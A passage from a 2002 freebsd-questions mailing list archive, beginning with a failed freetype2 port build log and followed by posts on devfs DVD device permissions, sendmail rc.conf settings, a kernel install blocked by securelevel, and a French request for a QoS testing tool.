"./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. gmake: [install] Error 2 (ignored) for P in /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/in= ternal/autohint.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/fr= eetype/internal/bdftypes.h /usr/ports/print/freetype2/work/freetype-2.1.1/i= nclude/freetype/internal/cfftypes.h /usr/ports/print/freetype2/work/freetyp= e-2.1.1/include/freetype/internal/fnttypes.h /usr/ports/print/freetype2/wor= k/freetype-2.1.1/include/freetype/internal/ftcalc.h /usr/ports/print/freety= pe2/work/freetype-2.1.1/include/freetype/internal/ftcore.h /usr/ports/print= /freetype2/work/freetype-2.1.1/include/freetype/internal/ftdebug.h /usr/por= ts/print/freetype2/work/freetype-2.1.1/include/freetype/internal/ftdriver.h= /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/internal/f= texcept.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/i= nternal/ftgloadr.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/f= reetype/internal/fthash.h /usr/ports/print/freetype2/work/freetype-2.1.1/in= clude/freetype/internal/ftmemory.h /usr/ports/print/freetype2/work/freetype= -2.1.1/include/freetype/internal/ftobject.h /usr/ports/print/freetype2/work= /freetype-2.1.1/include/freetype/internal/ftobjs.h /usr/ports/print/freetyp= e2/work/freetype-2.1.1/include/freetype/internal/ftstream.h /usr/ports/prin= t/freetype2/work/freetype-2.1.1/include/freetype/internal/fttrace.h /usr/po= rts/print/freetype2/work/freetype-2.1.1/include/freetype/internal/internal.= h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/internal/= pcftypes.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/= internal/psaux.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/fre= etype/internal/pshints.h /usr/ports/print/freetype2/work/freetype-2.1.1/inc= lude/freetype/internal/psnames.h /usr/ports/print/freetype2/work/freetype-2= .1.1/include/freetype/internal/sfnt.h /usr/ports/print/freetype2/work/freet= ype-2.1.1/include/freetype/internal/t1types.h /usr/ports/print/freetype2/wo= rk/freetype-2.1.1/include/freetype/internal/t42types.h /usr/ports/print/fre= etype2/work/freetype-2.1.1/include/freetype/internal/tttypes.h ; do = \ install -c -o root -g wheel -m 444 $P /usr/local/include/freetype= 2/freetype/internal ; \ done "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. gmake: [install] Error 2 (ignored) for P in /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/co= nfig/ftconfig.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/free= type/config/ftheader.h /usr/ports/print/freetype2/work/freetype-2.1.1/inclu= de/freetype/config/ftmodule.h /usr/ports/print/freetype2/work/freetype-2.1.= 1/include/freetype/config/ftoption.h /usr/ports/print/freetype2/work/freety= pe-2.1.1/include/freetype/config/ftstdlib.h ; do = \ install -c -o root -g wheel -m 444 $P /usr/local/include/freetype= 2/freetype/config ; \ done "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. gmake: [install] Error 2 (ignored) for P in /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ca= che/ftccache.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freet= ype/cache/ftccmap.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/= freetype/cache/ftcglyph.h /usr/ports/print/freetype2/work/freetype-2.1.1/in= clude/freetype/cache/ftcimage.h /usr/ports/print/freetype2/work/freetype-2.= 1.1/include/freetype/cache/ftcmanag.h /usr/ports/print/freetype2/work/freet= ype-2.1.1/include/freetype/cache/ftcsbits.h /usr/ports/print/freetype2/work= /freetype-2.1.1/include/freetype/cache/ftlru.h ; do = \ install -c -o root -g wheel -m 444 $P /usr/local/include/freetype= 2/freetype/cache ; \ done "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. gmake: [install] Error 2 (ignored) install -c -o root -g wheel -m 444 /usr/ports/print/freetype2/work/freetype= -2.1.1/builds/unix/ft2unix.h /usr/local/include/ft2build.h "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. gmake: *** [install] Error 2 *** Error code 2 Stop in /usr/ports/print/freetype2. *** Error code 1 Stop in /usr/ports/print/freetype2. ** Command failed: make ---> Restoring the old version ** Fix the installation problem and try again. [Updating the pkgdb in /var/db/pkg ... - 150 packages f= ound (-0 +1) . done] ** The following packages were not installed or upgraded (*:skipped / !:fai= led) ! print/freetype2 (freetype2-2.0.9) (install error) --G4iJoqBmSsgzjUCe-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 5:35:17 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx1.eskimo.com (mx1.eskimo.com [204.122.16.48]) by hub.freebsd.org (Postfix) with ESMTP id D341F37B408 for ; Tue, 25 Jun 2002 05:31:31 -0700 (PDT) Received: from eskimo.com (ripper@eskimo.com [204.122.16.13]) by mx1.eskimo.com (8.9.1a/8.8.8) with ESMTP id FAA13630 for ; Tue, 25 Jun 2002 05:31:31 -0700 Received: (from ripper@localhost) by eskimo.com (8.9.1a/8.9.1) id FAA02109; Tue, 25 Jun 2002 05:31:31 -0700 (PDT) Date: Tue, 25 Jun 2002 05:31:31 -0700 (PDT) Message-Id: <200206251231.FAA02109@eskimo.com> From: Ross Lippert To: freebsd-questions@freebsd.org Subject: devfs question Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I'm writing a section for the handbook on multimedia and I have a question about devfs. I am not running CURRENT, so I do not know much about how to set devfs up. The basic problem is this: many dvd playing apps either use as default or use hardcoded (god forbid, but it happens) /dev/dvd as the dvd device. And, to avoid having to run them as root, write permissions must be granted. So, what you'd like to have is # chmod 664 /dev/acd0c # ln -sf /dev/acd0c /dev/dvd # ln -sf /dev/acd0c /dev/rdvd Under 5.X, I seem to recall seeing somewhere that there is some sort of conf file in which one can specify this setup so that these commands do not need to be re-run at boot every time. Can someone tell me what is the right bit of magic I should tel people to do? -r To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 5:38:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from grillolja.cs.umu.se (grillolja.cs.umu.se [130.239.40.17]) by hub.freebsd.org (Postfix) with ESMTP id 6CA6837B404 for ; Tue, 25 Jun 2002 05:38:43 -0700 (PDT) Received: from gren.cs.umu.se (gren.cs.umu.se [130.239.40.187]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by grillolja.cs.umu.se (Postfix) with ESMTP id 12B7F9FD8; Tue, 25 Jun 2002 14:38:42 +0200 (MEST) Date: Tue, 25 Jun 2002 14:38:41 +0200 (MEST) From: Paul Everlund To: Jan Grant Cc: Joe & Fhe Barbish , FBSDQ Subject: RE: Periodic mails In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Jan Grant wrote: ----------> Thanks for your reply! > On Tue, 25 Jun 2002, Joe & Fhe Barbish wrote: > > > The connection attempt message you see in your /var/log/messages is > > generated by the log-in-vain rc.conf option because you do not have > > software listening on port 25 the pop3 server front door. > > Do you have qpopper installed? > > Eh? Port 25 is for SMTP, not POP. > > > Do nslookup 192.168.0.5 to see what that ip address is. > > The address given is a nonrouable local address; potentially the > address attached to an internal NIC. Yep, but my periodic mail should be send to localhost, so the address do not have to be routable. On the other hand it is strange it tries to send the mail via my firewall computer. > There are now four (count 'em!) sendmail switches that can be used in > /etc/rc.conf - see your updated /etc/default/rc.conf for details. This > was discussed in freebsd-stable when the changeover happened, so you may > find more information there. Anyhoo, they are: Am not subscribed to freebsd-stable. It's hard to just keep up with freebsd-questions. :-) > sendmail_enable="YES" # Run the sendmail inbound daemon (YES/NO/NONE). > # If NONE, don't start any sendmail processes. > sendmail_submit_enable="YES" # Start a localhost-only MTA for mail > submission > sendmail_outbound_enable="YES" # Dequeue stuck mail (YES/NO). > sendmail_msp_queue_enable="YES" # Dequeue stuck clientmqueue mail (YES/NO). > > You probably want NO, YES, YES, YES, respectively. This setup, does it permit mails only from and to the localhost? I want my computer to be totally closed to the outside when it comes to mail. Only internal mail on the same machine should be allowed. Best regards, Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 5:46:34 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by hub.freebsd.org (Postfix) with ESMTP id 511BD37B406 for ; Tue, 25 Jun 2002 05:46:25 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.4/8.12.4) with ESMTP id g5PCkDDd001248; Tue, 25 Jun 2002 07:46:14 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: RE: Kernel install problems From: Larry Rosenman To: Peter MacGee Cc: Aaron Burke , FreeBSD-Questions In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 07:46:13 -0500 Message-Id: <1025009174.1176.0.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 2002-06-25 at 05:50, Peter MacGee wrote: > Hi Larry, > > On 25 Jun 2002, Larry Rosenman wrote: > > > On Tue, 2002-06-25 at 05:40, Peter MacGee wrote: > > > Hi Aaron and Everyone, > > > > > > On Tue, 25 Jun 2002, Aaron Burke wrote: > > > > > > > > -----Original Message----- > > > > > From: owner-freebsd-questions@FreeBSD.ORG > > > > > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Peter MacGee > > > > > Sent: Tuesday, June 25, 2002 02:57 AM > > > > > To: freebsd-questions@FreeBSD.ORG > > > > > Subject: Kernel install problems > > > > > > > > > > > > > > > Hi All, > > > > > I'm currently trying to install a new kernel on my system > > > > > (4.6-STABLE). I have tried both the "new" and the "traditional" > > > > > methods that are prescribed in the handbook, and both times come up > > > > > against the error: > > > > > > > > > > chflags noschg /kernel > > > > > chflags: /kernel: Operation not permitted > > > > > *** Error code 1 (ignored) > > > > > mv /kernel /kernel.old > > > > > mv: rename /kernel to /kernel.old: Operation not permitted > > > > > *** Error code 1 > > > > > > > > > > I have searched archives et al all to no avail. Could anyone please help > > > > > on how to fix this problem? > > > > > > > > Are you running as root while doing these operations? > > > > > > Yes indeed. I have also had this exact same problem on another box of mine > > > running 4.5-RELEASE... Both times I was root whilst trying to perform the > > > operation. > > I'll bet your kern.securelevel is >0. > > You're quite correct, a quick scan of /etc/rc.conf reveals: > > kern_securelevel="2" > kern_securelevel_enable="YES" > > Should I comment these lines out, reboot, make install, re-instate > kern_securelevel lines, reboot and life be dandy? Or, reboot single user, install, reboot, and go on. > > Thanks for the help thus far, > Pete. -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 6: 7:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from parsmtp1.rd.francetelecom.com (parsmtp1.rd.francetelecom.com [194.167.105.13]) by hub.freebsd.org (Postfix) with ESMTP id 081A837B401 for ; Tue, 25 Jun 2002 06:07:27 -0700 (PDT) Received: from lanmhs50.rd.francetelecom.fr ([10.193.21.52]) by parsmtp1.rd.francetelecom.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 15:07:25 +0200 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C21C49.3FF863CD" Subject: Outil de mesure de performance - FreeBSD 3.4 X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Date: Tue, 25 Jun 2002 15:07:25 +0200 Message-ID: <32808FAD125F8A49A3145D4BB67ADC400D065C@lanmhs50.rd.francetelecom.fr> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Outil de mesure de performance - FreeBSD 3.4 Thread-Index: AcIcST/gL03Dn9Y8Sx2306+PdmJCng== From: =?iso-8859-1?Q?BORDEAU_St=E9phane_FTRD/DMR/REN?= To: X-OriginalArrivalTime: 25 Jun 2002 13:07:25.0570 (UTC) FILETIME=[403C9E20:01C21C49] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------_=_NextPart_001_01C21C49.3FF863CD Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Bonjour,=20 Je recherche un outil de mesure libre de QOS (d=E9lai, perte, ..) = g=E9n=E9rant du traffic UDP et TCP compatible avec FREE BSD 3.4 et IPv6. Merci d'avance pour vos conseils et pour votre r=E9ponse rapide. St=E9phane BORDEAU France T=E9l=E9com R&D DMR/DDH 4, rue du Clos Courtel 35512 Cesson S=E9vign=E9 stephane.bordeau@rd.francetelecom.com ------_=_NextPart_001_01C21C49.3FF863CD Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Outil de mesure de performance - FreeBSD 3.4

Bonjour,
Je recherche un outil de mesure libre = de QOS  (d=E9lai, perte, ..) g=E9n=E9rant du traffic UDP et TCP = compatible avec FREE BSD 3.4 et IPv6.

Merci d'avance pour vos conseils et = pour votre r=E9ponse rapide.


St=E9phane BORDEAU
France T=E9l=E9com R&D
DMR/DDH
4, rue du Clos Courtel
35512 Cesson S=E9vign=E9
stephane.bordeau@rd.francetelecom.com

------_=_NextPart_001_01C21C49.3FF863CD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 6:20:34 2002 Delivered-To: freebsd-questions@freebsd.org Received: from desert.zssm.zp.ua (desert.zssm.zp.ua [212.8.32.5]) by hub.freebsd.org (Postfix) with ESMTP id 2713937B400 for ; Tue, 25 Jun 2002 06:20:26 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by desert.zssm.zp.ua (8.11.3/8.11.3) with ESMTP id g5PDIMc92528; Tue, 25 Jun 2002 16:18:31 +0300 (EEST) (envelope-from stalker@hermes-comp.zp.ua) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id CE24738302; Tue, 25 Jun 2002 16:24:22 +0300 (EEST) Date: Tue, 25 Jun 2002 16:24:22 +0300 (EEST) From: Alexander V Zubchenko To: =?iso-8859-1?Q?BORDEAU_St=E9phane_FTRD/DMR/REN?= Cc: Subject: Re: Outil de mesure de performance - FreeBSD 3.4 In-Reply-To: <32808FAD125F8A49A3145D4BB67ADC400D065C@lanmhs50.rd.francetelecom.fr> Message-ID: <20020625161930.H6624-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=KOI8-R Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings! On Tue, 25 Jun 2002, [iso-8859-1] BORDEAU Stéphane FTRD/DMR/REN wrote: > Bonjour, > Je recherche un outil de mesure libre de QOS (délai, perte, ..) générant du traffic UDP et TCP compatible avec FREE BSD 3.4 et IPv6. > > Merci d'avance pour vos 